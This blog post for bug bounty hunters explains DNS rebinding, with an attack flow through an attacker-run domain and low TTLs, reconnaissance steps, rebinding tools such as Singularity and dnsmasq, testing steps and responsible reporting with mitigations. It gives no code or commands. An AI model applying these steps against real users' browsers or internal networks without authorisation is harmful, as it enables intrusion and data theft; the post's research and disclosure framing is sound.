How to Find DNS Rebinding Vulnerabilities in Bug Bounty Hunting

DNS rebinding is an advanced web security vulnerability that can open doors to impactful bug bounty submissions. This attack leverages the victim’s browser as a pivot to access internal networks or sensitive systems by exploiting the Domain Name System (DNS). In this blog, we’ll explore what DNS rebinding is, how to identify it during bug bounty hunting, and tools and techniques to boost your success rate.

DNS rebinding occurs when an attacker-controlled domain resolves to different IP addresses over time. Initially, it resolves to the attacker’s server, but subsequently, it resolves to an internal or restricted IP, such as 127.0.0.1 or 192.168.1.x. This tricks the victim's browser into sending requests to internal systems, bypassing same-origin policies and network restrictions.

Key Uses of DNS Rebinding:

Accessing Internal Applications: Attacking services running on internal IPs.Stealing Sensitive Data: Extracting confidential data from internal systems.Remote Code Execution (RCE): Triggering vulnerable APIs or services.Attacker Setup: The attacker sets up a DNS server to serve a malicious domain, say malicious.example.com.Victim Interaction: The victim accesses this domain via their browser.DNS Resolution: Initially, the domain resolves to the attacker’s external server. After a specified time (controlled via low TTL values), it resolves to an internal IP.Exploitation: The victim’s browser now communicates with internal systems, allowing the attacker to issue malicious requests.

1. Understand the Target’s Architecture

Identify exposed applications or endpoints that interact with internal systems.Look for subdomains or endpoints that resolve via dynamic DNS or rely on IP whitelisting.

2. Scan for Internal IP Leaks

Use nmap and masscan to map the internal network.Look for internal services such as Redis, Elasticsearch, Kubernetes, or web servers running on common ports like 80, 443, 8080.

3. Look for CORS Misconfigurations

DNS rebinding often exploits CORS (Cross-Origin Resource Sharing) misconfigurations to extract sensitive data.Use tools like corsy or manual testing with tools like Burp Suite to check for permissive CORS policies.

4. Check for IP-Based Access Restrictions

If a service is restricted to internal IPs, it could be a potential target for DNS rebinding.Validate whether the service is accessible when resolving to 127.0.0.1 or localhost.

5. Monitor for Same-Origin Policy (SOP) Bypasses

Use JavaScript payloads to detect whether internal systems can be accessed via DNS-rebinding domains.

1. Rebind Toolkit

Rebind: A simple, efficient toolkit for creating and testing DNS rebinding attacks.It automatically switches between the attacker-controlled server and internal IPs.

2. Singularity of Origin

Singularity: Automates the entire DNS rebinding process with an easy-to-use interface. It also provides attack templates for various scenarios.

3. Burp Suite Plugins

Plugins like Rebinding Assistant or custom Python scripts can automate DNS rebinding payload generation.

4. Manual DNS Server Configuration

If using tools isn’t an option, configure your own DNS server using dnsmasq or similar tools to serve responses with low TTLs.

Step-by-Step Testing:

Set Up a Malicious Domain:

Register a domain and configure its DNS to serve varying IP responses.

Craft Malicious Payloads:

Use JavaScript to send HTTP requests to internal IPs or localhost.

Host a Malicious Webpage:

Create a page that serves the payload and encourage victims to visit.

Analyze the Responses:

Capture network traffic to verify whether internal services responded to your crafted requests.

If you discover a DNS rebinding vulnerability:

Report the issue promptly via the platform’s bug bounty program.Provide a clear PoC (Proof of Concept) that demonstrates the attack’s impact.Suggest mitigation strategies, such as:Enforcing stricter DNS TTL policies.Restricting access to sensitive resources via authentication.Validating the Host header to block unauthorized access.

If you found this guide helpful and want to support my work, consider buying me a coffee at buymeacoffee.com/dineshpathm ☕ — your support keeps the research and content flowing!